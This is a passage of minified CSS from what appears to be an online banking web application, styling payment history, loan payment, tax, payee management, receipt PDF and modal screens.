1023px){.payment-history-credit-filter{padding:24px 16px}}.payment-history-credit-filter .btn-close{position:absolute;top:16px;right:16px;cursor:pointer}@media screen and (max-width: 1023px){.payment-history-credit-filter .btn-close{display:none}}@media screen and (min-width: 1024px){.payment-history-credit-filter .quick-filter{padding-right:48px}}.payment-history-credit-filter .quick-filter__title{font-size:14px;font-weight:500;line-height:20px;margin-bottom:8px}.payment-history-credit-filter .quick-filter__option{margin:0 -8px}@media screen and (max-width: 767px){.payment-history-credit-filter .quick-filter__option{margin:0;flex-wrap:wrap}}.payment-history-credit-filter .quick-filter__item{border:1px solid #C9D9EA;background-color:#fff;color:#062A46;height:48px;margin:0 8px;cursor:pointer}@media screen and (max-width: 767px){.payment-history-credit-filter .quick-filter__item{flex-basis:100%;margin:4px 0}}.payment-history-credit-filter .quick-filter__item.active{background-color:#CBE6FE;color:#005993}.payment-history-credit-filter .date-filter__title{font-size:14px;font-weight:500;line-height:20px;margin-bottom:8px}@media screen and (min-width: 1024px){.payment-history-credit-filter .date-filter__option{max-width:320px}}.payment-history__info{display:flex;align-items:center;color:#062A46;justify-content:space-between;flex-wrap:wrap;margin-top:16px}@media screen and (max-width: 1023px){.payment-history__info{margin-top:4px;display:block;font-size:14px;font-weight:400;line-height:22px}.payment-history__info__btn-detail{margin-top:24px;display:flex;justify-content:space-between;font-size:16px;font-weight:500;line-height:24px}}.payment-history__info__balance>.history-info-label{color:#C9D9EA}.payment-history__info__balance>.btn-detail-history-info{cursor:pointer;color:#005993}.payment-history__info__balance:not(:last-child){margin-right:48px}.payment-history__info__balance:nth-child(2){flex-grow:1}@media screen and (max-width: 1023px){.payment-history__info__balance{margin-top:4px;display:flex;justify-content:space-between;flex-wrap:wrap}.payment-history__info__balance:not(:last-child){margin-right:0}}.payment-history__detail-info{margin-top:24px}.payment-history__detail-info .box-info .detail-list-item{display:flex;flex-direction:row;color:#062A46;font-size:14px;font-weight:400;line-height:20px;padding-bottom:24px;margin-bottom:24px;border-bottom:1px dashed #C9D9EA}.payment-history__detail-info .box-info .detail-list-item .column-separate{background-color:#E7EEF3;margin:0 40px;flex-basis:1px;min-width:1px}.payment-history__detail-info .box-info .detail-list-item .account-status.active{color:#4CB944}.payment-history__detail-info .box-info .detail-list-item:nth-last-child(1){padding-bottom:0;margin-bottom:0;border-bottom:none}.payment-history__detail-info .box-info .detail-list-item>.column-item td{padding:4px;padding-left:12px;vertical-align:text-top}.payment-history__detail-info .box-info .detail-list-item>.column-item td.item-label{padding-right:24px;max-width:228px}.payment-history__detail-info .box-info .detail-list-item>.column-item td.item-label .wrap{position:relative}.payment-history__detail-info .box-info .detail-list-item>.column-item td.item-label .dot{width:4px;height:4px;display:inline-block;background:#005993;border-radius:100%;margin-right:8px;position:absolute;left:-12px;top:4px}@media screen and (max-width: 1023px){.payment-history__detail-info .box-info .detail-list-item{flex-direction:column}.payment-history__detail-info .box-info .detail-list-item .column-separate{display:none}.payment-history__detail-info .box-info .column-item table{width:100%}.payment-history__detail-info .box-info .column-item table .item-label{width:50%;padding-right:4px}.payment-history__detail-info .box-info .column-item table .item-value{width:50%;padding-left:4px;text-align:right}}.payment-history__detail-info__title{display:flex;flex-flow:row;margin-bottom:16px}.payment-history__detail-info__title--label{font-size:14px;font-weight:500;line-height:18px}.payment-history__detail-info__title--label span{margin-right:10px}.payment-history__detail-info__title--label img{cursor:pointer}.payment-history-search{width:100%;padding:24px;border-radius:10px;margin-top:22px;background-color:#F4F8FB;position:relative}@media screen and (max-width: 1023px){.payment-history-search{padding:24px 16px}}.payment-history-search .btn-close{position:absolute;top:16px;right:16px;cursor:pointer}@media screen and (max-width: 1023px){.payment-history-search .btn-close{display:none}}.payment-history-search>.btn-clear{position:absolute;top:58px;right:16px;cursor:pointer}@media screen and (max-width: 1023px){.payment-history-search>.btn-clear{top:16px}}.payment-history-search .date-picker{display:block}.payment-history-search__row{display:flex;flex-direction:row;align-items:flex-start;flex-wrap:wrap;width:100%}@media screen and (min-width: 1024px){.payment-history-search__row:first-of-type{padding-right:32px}}.payment-history-search__row .column-first,.payment-history-search__row .column-rest{max-width:100%}.payment-history-search__row .column-first{min-width:304px;margin-right:32px;margin-bottom:16px}@media screen and (max-width: 1023px){.payment-history-search__row .column-first{margin-right:0;min-width:auto}}.payment-history-search__row .column-rest{margin-bottom:16px;flex:1 1 auto}.payment-history-search__row .column-rest .input-money{max-width:304px;min-width:200px}@media screen and (max-width: 1023px){.payment-history-search__row .column-rest .input-money{max-width:none;flex-basis:100%}.payment-history-search__row .column-rest .input-money:not(:first-child){margin-top:8px}}.payment-history-search__row .column-rest .group-radio{min-height:48px;height:auto}.payment-history-search__row .column-rest .radio-button-group{flex-wrap:nowrap;white-space:nowrap}@media screen and (max-width: 1023px){.payment-history-search__row .column-rest .cms-flex{display:block}.payment-history-search__row .column-rest__break{display:none}.payment-history-search__row .column-rest .radio-button-group{width:100%;flex-wrap:wrap}.payment-history-search__row .column-rest .radio-button-group .custom-radio{flex-basis:100%;margin-right:0;margin-top:8px}}.payment-history-search__row:nth-last-child(1){margin-bottom:0}.payment-history-search__row .input-money{min-width:200px}@media screen and (max-width: 1023px){.payment-history-search__row{display:block}}.payment-history-search__tool--item{display:flex;flex-flow:column;flex:1;margin-right:25px}.payment-history-search__tool--item-label{margin-bottom:8px;font-size:14px;font-weight:500}.group-radio{width:100%;height:48px;display:flex;flex-direction:row;align-items:center}.group-radio .custom-radio{margin-right:20px;cursor:pointer}.payment-history{padding:32px;display:flex;flex-flow:column}@media screen and (max-width: 1023px){.payment-history{padding:32px 16px}}.payment-history__action{display:flex;align-items:center}.payment-history__action>*{text-align:left}@media screen and (max-width: 1023px){.payment-history__action{flex-basis:100%;flex-wrap:wrap;justify-content:flex-start}}.payment-history__filter{margin-top:24px;background-color:#fff;box-shadow:0px 8px 10px rgba(32,71,101,0.02);border-radius:10px;padding:30px 32px}@media screen and (max-width: 1023px){.payment-history__filter{padding:30px 16px;display:flex;flex-direction:column}}.payment-history__filter .toggle-filter-detail{margin-left:16px}@media screen and (max-width: 1023px){.payment-history__filter .toggle-filter-detail{display:none}}.payment-history__filter .toggle-filter-detail button{min-width:160px}.payment-history__filter .toggle-filter-detail--mobile{order:99;display:none}@media screen and (max-width: 1023px){.payment-history__filter .toggle-filter-detail--mobile{display:block}}.payment-history__filter .toggle-filter-detail--mobile button{width:100%}.payment-history__filter .toggle-filter-detail--mobile .filter-actions{transform:translateY(-10px);background-color:#F4F8FB;padding:16px;border-radius:10px}.payment-history__filter__select{flex:1 1 auto}@media screen and (min-width: 1024px){.payment-history__filter__select>div{max-width:600px}}.payment-history__filter--btnFilter{display:flex;justify-content:flex-end;align-items:center}@media screen and (max-width: 1023px){.payment-history__table{display:none}}@media screen and (min-width: 1024px){.payment-history__sort{display:none}}.payment-history__modal-transaction .modal-transaction-main,.payment-history__modal-list .modal-transaction-main{background-image:url("/static/image/logo/logonotext-transparent.png");background-repeat:no-repeat;background-size:contain;background-color:#F4F8FB;background-position:center;background-size:300px;padding:0px 32px}.payment-history__modal-transaction .modal-transaction-note,.payment-history__modal-list .modal-transaction-note{display:block;font-size:12px;line-height:20px;padding:16px 0px;color:#9EB3C9}.payment-history__modal-transaction .modal-transaction-title,.payment-history__modal-list .modal-transaction-title{position:relative;padding:0px 32px}.payment-history__modal-transaction .modal-transaction-title--label,.payment-history__modal-list .modal-transaction-title--label{font-size:18px;line-height:24px;margin-bottom:8px;color:#4CB944;font-weight:500}.payment-history__modal-transaction .modal-transaction-title--date,.payment-history__modal-list .modal-transaction-title--date{font-size:14px;line-height:20px;margin-bottom:16px;color:#062A46}.payment-history__modal-transaction .container-qr,.payment-history__modal-list .container-qr{width:120px;height:120px;position:absolute;top:0;right:0}.payment-history__modal-list{width:930px}.payment-history__modal-list .modal-transaction-note{display:block;font-size:12px;line-height:20px;padding:16px 46px 32px 46px;color:#9EB3C9}.payment-history__amount{text-align:right}.payment-loan .group-amount__item{display:flex;flex-direction:row;align-items:center;margin-top:24px}.payment-loan .group-amount__item.spec{align-items:flex-start}.payment-loan .group-amount__item.spec .custom-radio{line-height:48px}.payment-loan .group-amount__item .custom-radio{margin-right:16px}.payment-loan .group-amount__item .custom-radio .label-radio{margin-left:16px}.payment-loan .group-amount__item:first-child{margin-top:0}.payment-loan .group-amount__item .input-money{flex:1}.payment-loan .group-amount__item .input-money__input{margin:0}.payment-loan__content__form{padding:32px}.payment-loan__content__form .toggle-accept{cursor:pointer}.payment-loan__content__form .toggle-accept img{margin-right:8px}.payment-loan__content__form .loan-pay-method>*{margin-right:40px}.payment-loan__content__form .loan-pay-method>*:nth-last-child(1){margin-right:0}.payment-loan__content__otp{padding:32px}.payment-loan__content__otp .otp-type>*{margin-right:16px}.payment-loan__content__otp .otp-type>*:nth-last-child(1){margin-right:0}.payment-loan__content__otp .m-top{margin-top:24px}.payment-loan__content__otp .details-from__balance{display:flex;flex-direction:row;align-items:center;justify-content:space-between;padding-top:8px;margin-top:16px;border-top:1px solid #005993;font-size:14px;font-weight:400;line-height:20px}.payment-loan__content__otp .otp-sent{color:#005993}.payment-loan__content__success__head-info .head-info__bank{display:flex;flex-direction:row;align-items:flex-start;justify-content:space-between;padding:24px}.payment-loan__content__success__head-info .head-info__bank__contact--phone{color:#005993}.payment-loan__content__success__head-info .head-info__transaction{display:flex;flex-direction:row;justify-content:space-between;align-items:flex-start;padding:24px;padding-top:0}.payment-loan__content__success__head-info .head-info__transaction--message-success{color:#41A43A}.payment-loan__content__success__head-info .head-info__transaction__wrap-qrcode{position:relative}.payment-loan__content__success__head-info .head-info__transaction__wrap-qrcode--qrcode{position:absolute;top:0;right:0;z-index:1}.payment-loan__content__success__details{padding:0 24px;background-size:contain;background-position:center;background-repeat:no-repeat;background-image:url("/static/image/logo/logonotext-transparent.png");background-size:300px;background-color:#F4F8FB}.payment-loan__content__success__details__hint{margin-top:64px;padding-bottom:16px;color:#9EB3C9}.payment-loan__content__success__details .app-list .negative-value{color:#EE2E63}.payment-loan__content__success .footer{padding:24px;padding-top:0}.payment-loan .account-detail-box{margin-top:16px;border:1px solid #E7EEF3;border-radius:4px;max-width:512px;padding:12px 0;font-size:14px;font-weight:400;line-height:20px}.payment-loan .account-detail-box:empty{display:none}.payment-loan .account-detail-box__item{padding:4px 12px;display:flex;flex-direction:row;justify-content:space-between}.payment-loan .account-detail-box__item span:nth-child(2){text-align:right}.flight-info{background-color:#F4F8FB;padding:0 16px 16px 16px}@media screen and (max-width: 1023px){.flight-info{margin-top:16px}}.flight-info__header{padding:16px 0 8px 0;border-bottom:1px dashed #C9D9EA;font-size:16px;font-weight:500;line-height:24px}.flight-info__header img{vertical-align:bottom;margin-right:8px}.flight-info__going,.flight-info__return{width:392px}@media (min-width: 1200px){.flight-info__going{margin-right:32px}}.flight-info.error{border-top:1px solid #EA114E;border-bottom:1px solid #EA114E}.payment-form__content__detail-bill .list-bill__title{padding:16px 0 8px 0}.payment-form__content__detail-bill .list-bill__footer{justify-content:space-between}@media screen and (min-width: 1024px){.payment-form__content__detail-bill .list-bill__footer{border-top:1px solid #C9D9EA}}.payment-form__content__detail-bill .list-bill__footer .label{color:#9EB3C9}.payment-form__content__detail-bill .list-bill.error .list-bill__footer{border-top:none}.payment-form__content__detail-bill .empty-bill{border-top:1px solid #C9D9EA;background-image:url("/static/image/background/empty.svg");background-color:rgba(244,248,251,0.4);background-repeat:no-repeat;background-size:208px;background-position:48px 40px;height:160px;padding-left:256px;padding-right:24px;display:flex;align-items:center}.payment-form__content__detail-bill .empty-bill .text{max-width:248px;min-width:120px;font-size:12px;line-height:20px;color:#9EB3C9}.payment-form__content__detail-bill .bill-error{margin-top:32px;margin-bottom:-40px}@media screen and (max-width: 1023px){.payment-form__content__detail-bill .list-bill__table{display:none}}.manulife__note{margin-top:16px;font-size:12px;font-weight:400;line-height:20px;color:#9EB3C9;white-space:pre-wrap}.manulife__radio.custom-radio{align-items:center}.manulife__radio.custom-radio img{margin-top:0}.manulife__total-amount{text-align:right;margin-top:32px;margin-bottom:-16px}.fee{padding:8px 0}.fee__ul{margin-left:24px}.fee__period{margin-top:8px}.fee__period__note{margin-top:4px;font-size:12px;font-weight:400;line-height:20px;color:#9EB3C9}.fee-row{margin-top:4px}@media screen and (min-width: 1024px){.fee-row{display:flex;align-items:baseline}.fee-row>:nth-child(1){flex:3}.fee-row>:nth-child(2){flex:7;margin-left:16px}.fee-row>:nth-child(2)>*{max-width:calc(512px - 16px)}}@media screen and (max-width: 1023px){.fee-row>:nth-child(2){margin-top:8px}}.vnshop-bill.error *{border-color:#EE2E63}@media screen and (max-width: 1023px){.vnshop-bill .vnshop-bill__table{display:none}}.payment-form{background-color:#F4F8FB;box-shadow:none}.payment-form__grid{border-radius:10px;background-color:#fff;-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.05);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.05);box-shadow:0px 8px 10px rgba(32,71,101,0.05);position:relative;overflow:hidden}.payment-form__grid__row{display:flex}.payment-form__grid__row:only-child .payment-form__grid__item::after{height:100% !important}.payment-form__grid__row:first-child .payment-form__grid__item::after{top:0;height:calc(100% + 1px)}.payment-form__grid__row:first-child .payment-form__grid__item:first-child::after{border-top-left-radius:10px}.payment-form__grid__row:first-child .payment-form__grid__item.end-row::after{border-top-right-radius:10px}.payment-form__grid__row:last-of-type .payment-form__grid__item{border-bottom:none}.payment-form__grid__row:last-of-type .payment-form__grid__item::after{height:calc(100% + 1px)}.payment-form__grid__row:last-of-type .payment-form__grid__item:only-child::after{width:100%}.payment-form__grid__row:last-of-type .payment-form__grid__item:first-child::after{border-bottom-left-radius:10px}.payment-form__grid__row:last-of-type .payment-form__grid__item.end-row::after{border-bottom-right-radius:10px}.payment-form__grid__item{flex-basis:calc(100%/3);min-width:calc(100%/3);max-width:calc(100%/3);border-right:1px solid #ddd;border-bottom:1px solid #ddd;position:relative;padding:16px 12px;cursor:pointer}@media only screen and (min-width: 720px){.payment-form__grid__item{flex-basis:calc(100%/4);min-width:calc(100%/4);max-width:calc(100%/4);padding:16px}}@media only screen and (min-width: 960px){.payment-form__grid__item{flex-basis:calc(100%/5);min-width:calc(100%/5);max-width:calc(100%/5)}}@media only screen and (min-width: 1024px){.payment-form__grid__item{flex-basis:calc(100%/5);min-width:calc(100%/5);max-width:calc(100%/5)}}@media only screen and (min-width: 1200px){.payment-form__grid__item{flex-basis:calc(100%/6);min-width:calc(100%/6);max-width:calc(100%/6)}}@media only screen and (min-width: 1440px){.payment-form__grid__item{flex-basis:calc(100%/7);min-width:calc(100%/7);max-width:calc(100%/7)}}@media only screen and (min-width: 1750px){.payment-form__grid__item{flex-basis:calc(100%/8);min-width:calc(100%/8);max-width:calc(100%/8)}}@media only screen and (min-width: 1920px){.payment-form__grid__item{flex-basis:calc(100%/9);min-width:calc(100%/9);max-width:calc(100%/9)}}.payment-form__grid__item.active::after{content:''}.payment-form__grid__item::after{content:none;position:absolute;top:-1px;left:-1px;width:calc(100% + 2px);height:calc(100% + 2px);border:1px solid #EA114E}.payment-form__grid__item:first-child::after{left:0;width:calc(100% + 1px)}.payment-form__grid__item:last-child{border-right:none}.payment-form__grid__item:last-child::after{width:calc(100% + 1px)}.payment-form__grid__item:only-child::after{width:100%}.payment-form__grid__item__ic{height:44px;margin-bottom:8px}.payment-form__grid__item span{height:44px;font-size:16px;font-weight:500;line-height:22px;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden}.payment-form__grid__item .check{position:absolute;top:16px;right:16px}.payment-form__grid .view-less{position:absolute;cursor:pointer;bottom:-25px;right:32px;height:60px;width:60px;background-color:#F4F8FB;border-radius:50%;padding-top:5px;align-items:flex-start;display:flex;justify-content:center}.payment-form__content{-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.05);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.05);box-shadow:0px 8px 10px rgba(32,71,101,0.05);border-radius:10px;background-color:#fff;margin-top:24px}.payment-form__content .payment-layout__body{min-height:360px}.payment-confirm__body .amount-vi{margin-left:24px;color:#9EB3C9}.payment-confirm__body__radio>:not(:first-child){margin-left:32px}.payment-confirm__body__otp{margin-top:24px}.payment-confirm__body__otp .label{color:#005993}.payment-confirm__body__otp .code{margin-top:24px}.top-up-form__body__prices{display:grid;grid-template-columns:repeat(2, 1fr);grid-auto-rows:1fr;column-gap:16px;row-gap:16px}@media (min-width: 768px){.top-up-form__body__prices{grid-template-columns:repeat(3, 1fr)}}@media (min-width: 1200px){.top-up-form__body__prices{grid-template-columns:repeat(4, 1fr)}}.top-up-form__body__prices .price{font-size:14px;font-weight:400;line-height:20px;border:1px solid #C9D9EA;padding:16px 8px;display:flex;text-align:center;justify-content:center;align-items:center;cursor:pointer}.top-up-form__body__prices .price.active{background-color:#CBE6FE;border-color:#CBE6FE;color:#005993}.pt-pdf-display-none{display:none}.pt-pdf{padding:24px;font-size:14px}.pt-pdf .small-text{font-size:12px}.pt-pdf .wrap-checkbox{display:flex;align-items:center;display:inline-block}.pt-pdf .wrap-checkbox .checkbox{width:14px;height:14px;border:1px solid #9EB3C9;display:inline-block;margin-left:2px;position:relative;top:2px}.pt-pdf .wrap-checkbox .checkbox.checked:after{content:'';display:block;width:4px;height:7px;position:relative;top:2px;left:4px;border:solid #000;border-width:0 2px 2px 0;transform:rotate(45deg)}.pt-pdf__header__info{display:flex;justify-content:space-between}.pt-pdf__header__info .left{border:1px dashed #9EB3C9;display:flex;justify-content:center;align-items:center;padding:6px}.pt-pdf__header__info .right{display:flex;flex-direction:column;text-align:center}.pt-pdf__header__title{padding-top:24px;text-align:center;margin:auto}.pt-pdf__header__title .title{font-size:18px;font-weight:600}.pt-pdf__header__title .transform-type,.pt-pdf__header__title .currency-type{justify-content:center}.pt-pdf__info{padding-top:8px}.pt-pdf__info .value{font-weight:500;padding-left:8px}.pt-pdf__info table{width:100%;margin-top:24px}.pt-pdf__info table th{text-align:center;font-weight:600}.pt-pdf__info table table,.pt-pdf__info table th,.pt-pdf__info table td{border:1px solid #9EB3C9;border-collapse:collapse}.pt-pdf__info table td{padding:6px;text-align:left;font-size:14px}.pt-pdf__info table .total{font-weight:600}.pt-pdf .row{display:flex;flex-grow:1;flex-wrap:wrap;margin:12px 0px}.pt-pdf .row .w-1{width:10%}.pt-pdf .row .w-2{width:20%}.pt-pdf .row .w-3{width:30%}.pt-pdf .row .w-4{width:40%}.pt-pdf .row .w-5{width:50%}.pt-pdf .row .w-6{width:60%}.pt-pdf .row .w-7{width:70%}.pt-pdf .row .w-8{width:80%}.pt-pdf .row .w-9{width:90%}.pt-pdf .row .w-10{width:100%}.pt-pdf .justify-space-between{display:flex;justify-content:space-between}.pt-pdf .text-left{text-align:left}.pt-pdf .text-right{text-align:right}.pt-pdf .text-center{text-align:center !important}.pt-pdf .font-small{font-size:14px}.pt-pdf .footer{margin-top:24px;border:1px dashed #9EB3C9}.pt-pdf .footer .value{font-weight:500;padding-left:8px}.pt-pdf .footer .section-1{border-bottom:1px dashed #9EB3C9}.pt-pdf .footer .section-1 .title{font-size:18px;text-decoration:underline}.pt-pdf .footer .section-1 .codes{margin-top:18px;margin-bottom:10px}.pt-pdf .footer .section-1 .codes .code{display:flex;flex-direction:row;justify-content:space-around}.pt-pdf .footer .section-1 .codes .code>div{flex-basis:50%;text-align:left;padding:0px 24px}.pt-pdf .footer .section-2{display:flex;flex-direction:row;height:200px}.pt-pdf .footer .section-2 .left{border-right:1px dashed #9EB3C9;width:50%}.pt-pdf .footer .section-2 .right{width:50%}.pt-pdf .footer .section-1,.pt-pdf .footer .section-2{margin-top:10px;text-align:center}.pt-pdf .footer .section-1 .title,.pt-pdf .footer .section-2 .title{font-weight:600;text-transform:uppercase}.pt-pdf .footer .section-1 .bold,.pt-pdf .footer .section-2 .bold{font-weight:600}.pt-pdf .footer .section-1 .position,.pt-pdf .footer .section-2 .position{display:flex;flex-direction:row;justify-content:space-around;padding:0px 4px}.pt-pdf .footer .section-1 .position>div,.pt-pdf .footer .section-2 .position>div{width:33%;height:160px;display:flex;flex-direction:column;justify-content:space-between}.pt-pdf .footer .section-1 .position>div .signature,.pt-pdf .footer .section-2 .position>div .signature{padding-bottom:20px;text-transform:capitalize}.tax{min-height:100%;display:flex;flex-direction:column}.tax .payment-layout__content{display:flex;flex-direction:column}.tax .tax-search{position:relative;border-bottom:2px solid #8FD7F6;flex:1;background-repeat:no-repeat;background-position:bottom right;background-size:77% 50%;background-image:url("/static/image/background/personal-tax-cloud.png")}.tax .tax-search__content{position:relative}.tax .tax-search__content .opt-disabled{pointer-events:none;color:#9EB3C9}.tax .tax-search__form{width:50%;max-width:432px;min-width:264px}.tax .tax-search__background{z-index:0;position:absolute;right:0;bottom:0;height:100%;width:50%;min-width:328px;text-align:center;padding:80px 0}@media screen and (min-width: 1024px){.tax .tax-search__background{margin-right:32px}}.tax .tax-search__background .img-user{position:relative;height:100%;width:100%}.tax .tax-search .go-register{color:#79CCF3}.tax .tax-info tr td:first-child{width:1%;white-space:nowrap}@media screen and (max-width: 1023px){.tax .tax-info__table{display:none}}.tax .tax-form__group-select-section>*{flex-grow:0;flex-shrink:0;flex-basis:calc(50% - 8px)}.tax .tax-otp__spec-row{border-bottom-style:solid}.tax .tax-otp__spec-row .col-label{text-transform:uppercase}.tax .tax-success__label{margin-top:24px;text-transform:uppercase;color:#9EB3C9;letter-spacing:1.2px}.personal{min-height:100%;display:flex;flex-direction:column}.personal>.heading-5{padding-bottom:17px}.bill-payees-contacts{padding-top:32px}.bill-payees-contacts__header{display:flex;flex-wrap:wrap;margin-bottom:8px}.bill-payees-contacts__header>div{margin-bottom:8px}.bill-payees-contacts__header>button{margin-left:auto;margin-bottom:8px}.bill-payees-contacts__list .customer-code-col{padding-left:24px}.bill-payees-contacts__list .customer-code-col.due .number{position:relative}.bill-payees-contacts__list .customer-code-col.due .number::before{content:"";position:absolute;left:-12px;top:50%;transform:translateY(-50%);height:4px;width:4px;background-color:red;border-radius:50%}.bill-payees-contacts__modal__container{width:80%;max-width:800px;min-height:70vh}.bill-payees-contacts__modal__content{min-height:70vh;display:flex;flex-direction:column}.bill-payees-contacts__modal__content .header{font-size:20px;font-weight:600;line-height:30px;align-self:center}.bill-payees-contacts__modal__content .body{flex-grow:1}@media screen and (max-width: 1023px){.bill-payees-contacts .bill-list-table{display:none}}.payee-mgt{padding-top:32px}.payee-mgt__header{display:flex;flex-wrap:wrap;margin-bottom:24px}@media screen and (max-width: 1023px){.payee-mgt__header{margin-bottom:8px}}.payee-mgt__header>div{margin-bottom:8px}.payee-mgt__header>button{margin-left:auto;margin-bottom:8px}.payee-mgt .payee-mgt__filter{margin-top:8px}@media screen and (max-width: 1023px){.payee-mgt .payee-mgt__filter{flex-wrap:wrap}}.payee-mgt .payee-mgt__type{flex:3}@media screen and (max-width: 1023px){.payee-mgt .payee-mgt__type{flex-basis:100%}}.payee-mgt .payee-mgt__search{flex:7}@media screen and (max-width: 1023px){.payee-mgt .payee-mgt__search{margin-top:8px;flex-basis:100%}}.payee-mgt .payee-mgt__list__nickname{color:#9EB3C9}.payee-mgt .payee-mgt__list .payee__col-favorite{max-width:40px}.payee-mgt .payee-mgt__list .payee__col-favorite--hover{display:none}.payee-mgt .payee-mgt__list .vt-table-row:hover .payee__col-favorite--hover{display:block}.payee-mgt .payee-mgt__list .vt-table-row:hover .payee__col-favorite--normal{display:none}.modal-payee-details .modal-container{width:100%;max-width:800px}.modal-payee-details .hint-name{color:#9EB3C9}.modal-payee-details .modal-payee-details__name{color:#062A46}.modal-payee-details .modal-payee-details__body{min-height:320px}.modal-payee-form .modal-container{width:100%;max-width:800px}.modal-payee-form .toggle-favorite{color:#005993;cursor:pointer;display:inline-block}@media screen and (max-width: 1023px){.beneficiary-list-table{display:none}}.contact-mgt .filter,.contact-mgt .list-contact{background:#fff;-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.02);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.02);box-shadow:0px 8px 10px rgba(32,71,101,0.02);border-radius:10px;padding:32px;margin-top:24px}.contact-mgt .filter .cus-btn{min-width:130px}.contact-mgt .filter .filter-head{display:flex;flex-direction:row;align-items:flex-end}.contact-mgt .filter .filter-head>div{flex:1}.contact-mgt .filter .filter-head .contact-type .label{margin-bottom:8px}.contact-mgt .filter .filter-head .contact-action{text-align:right}.contact-mgt .filter .filter-head .contact-action>*{margin-right:16px}.contact-mgt .filter .filter-head .contact-action>*:last-child{margin-right:0}.contact-mgt .filter .filter-details{margin-top:24px;background-color:#F4F8FB;padding:24px;border-radius:10px;position:relative;display:none}.contact-mgt .filter .filter-details.show{display:block}.contact-mgt .filter .filter-details .btn-close{position:absolute;top:16px;right:16px}.contact-mgt .filter .filter-details .search{display:flex;flex-direction:row;align-items:flex-end;margin-bottom:24px}.contact-mgt .filter .filter-details .search>*{flex:1}.contact-mgt .filter .filter-details .search .search-label{margin-bottom:8px}.contact-mgt .filter .filter-details .search .wrap-btn-filter button{margin-left:32px}.contact-mgt .filter .filter-details .transaction-type .label-type{margin-bottom:16px}.contact-mgt .filter .filter-details .transaction-type .list-type>*{margin-right:24px}.contact-mgt .filter .filter-details .transaction-type .list-type>*:last-child{margin-right:0}.contact-mgt .list-contact .wrap{overflow:auto}.contact-mgt .list-contact .wrap .table-contact-receiver{min-width:872px}.contact-mgt .list-contact .wrap .table-contact-receiver .row-flex .col-flex:nth-child(1){flex:0 0 36px}.contact-mgt .list-contact .wrap .table-contact-receiver .row-flex .col-flex:nth-child(2){flex:3 0}.contact-mgt .list-contact .wrap .table-contact-receiver .row-flex .col-flex:nth-child(3){flex:3 0}.contact-mgt .list-contact .wrap .table-contact-receiver .row-flex .col-flex:nth-child(4){flex:3 0}.contact-mgt .list-contact .wrap .table-contact-receiver .row-flex .col-flex:nth-child(5){flex:5 0}.contact-mgt .list-contact .wrap .table-contact-bill{min-width:872px}.contact-mgt .list-contact .wrap .table-contact-bill .row-flex .col-flex:nth-child(1){flex:4 0 36px}.contact-mgt .list-contact .wrap .table-contact-bill .row-flex .col-flex:nth-child(2){flex:4 0}.contact-mgt .list-contact .wrap .table-contact-bill .row-flex .col-flex:nth-child(3){flex:5 0}.contact-mgt .list-contact .wrap .table-contact-bill .row-flex .col-flex:nth-child(4){flex:4 0}.table-flex .row-flex{display:flex;flex-direction:row;align-items:center;padding:16px 8px;position:relative;overflow:hidden;background-color:white;font-weight:normal;font-size:14px;line-height:20px}.table-flex .row-flex:nth-of-type(even){background:#F4F8FB}.table-flex .row-flex:first-child,.table-flex .row-flex:last-child{border-bottom:1px solid #C9D9EA}.table-flex .row-flex.head{text-transform:uppercase;font-weight:500;line-height:18px}.table-flex .row-flex .col-flex{padding:0px 8px}.table-flex .row-flex .action{position:absolute;height:100%;top:0;right:0;display:none;flex-direction:row;padding-left:32px;background:linear-gradient(270deg, #fff 90.67%, rgba(255,255,255,0) 112.33%),rgba(255,255,255,0.6)}.table-flex .row-flex .action>*{margin-right:22px}.table-flex .row-flex:hover{-webkit-box-shadow:0px 8px 15px rgba(124,158,177,0.1);-moz-box-shadow:0px 8px 15px rgba(124,158,177,0.1);box-shadow:0px 8px 15px rgba(124,158,177,0.1);font-weight:500}.table-flex .row-flex:hover .action{display:flex}.modal-template{width:calc(100vw - 376px);max-width:800px}.modal-template .head{padding:28px 32px;display:flex;flex-direction:row;align-items:center;justify-content:space-between}.modal-template .head .logo img{width:149px}.modal-template .head .contact-info{text-align:right}.modal-template .head .contact-info .phone{color:#005993}.modal-template .head .contact-info .website{color:#062A46;font-size:14px;font-weight:400;line-height:20px}.modal-template .body-success{padding:40px;text-align:center;background-color:#F4F8FB}.modal-template .body-success img{width:170px;margin-bottom:22px}.modal-template .body-success .message-success{max-width:340px;margin:auto}.modal-template .body-form{background-color:#F4F8FB;padding:32px}.modal-template .body-form .label-favorite{color:#9EB3C9}.modal-template .body-form .label-favorite.active{color:#005993}.modal-template .body-form>*{margin-bottom:24px}.modal-template .body-form>*:last-child{margin-bottom:0}.modal-template .body-form .modal-row{display:flex;flex-direction:row;align-items:center}.modal-template .body-form .modal-row .modal-col:first-child{flex:3;margin-right:20px;max-width:150px}.modal-template .body-form .modal-row .modal-col:last-child{flex:7;max-width:478px}.modal-template .body-detail .head-info{padding:0 32px}.modal-template .body-detail .head-info .name{color:#062A46}.modal-template .body-detail .head-info .hintName,.modal-template .body-detail .head-info .status{font-size:14px;font-weight:400;line-height:20px;margin-top:8px}.modal-template .body-detail .head-info .hintName{color:#9EB3C9}.modal-template .body-detail .head-info .due{color:#EA114E}.modal-template .body-detail .details{margin-top:16px;padding:0 32px;min-height:343px;background-image:url("/static/image/logo/logonotext-transparent.png");background-size:contain;background-repeat:no-repeat;background-position:center;background-color:#F4F8FB}.modal-template .body-detail .details .row{display:flex;padding:15px 0;border-bottom:1px dashed #C9D9EA}.modal-template .body-detail .details .row:last-child{border-bottom:none}.modal-template .body-detail .details .row .label{flex:3;color:#062A46;margin-right:20px}.modal-template .body-detail .details .row .value{flex:7;font-size:16px;font-weight:500;line-height:22px;color:#062A46}.modal-template .footer{padding:32px;padding-top:24px;display:flex;flex-direction:row;align-items:center;justify-content:space-between}.modal-template .footer .btn-transparent{background-color:transparent;color:#9EB3C9}.modal-template .footer .btn-edit-delete{color:#005993}.modal-template .footer .btn-edit-delete img{margin-top:-5px}.modal-template .footer .btn-close img{margin-right:8px;margin-top:-4px}.modal-template .footer .action-right>*{margin-right:16px}.modal-template .footer .action-right>*:last-child{margin-right:0}.personal-information{background:#fff;box-shadow:0px 8px 10px rgba(32,71,101,0.02);border-radius:10px;padding-top:32px}.personal-information 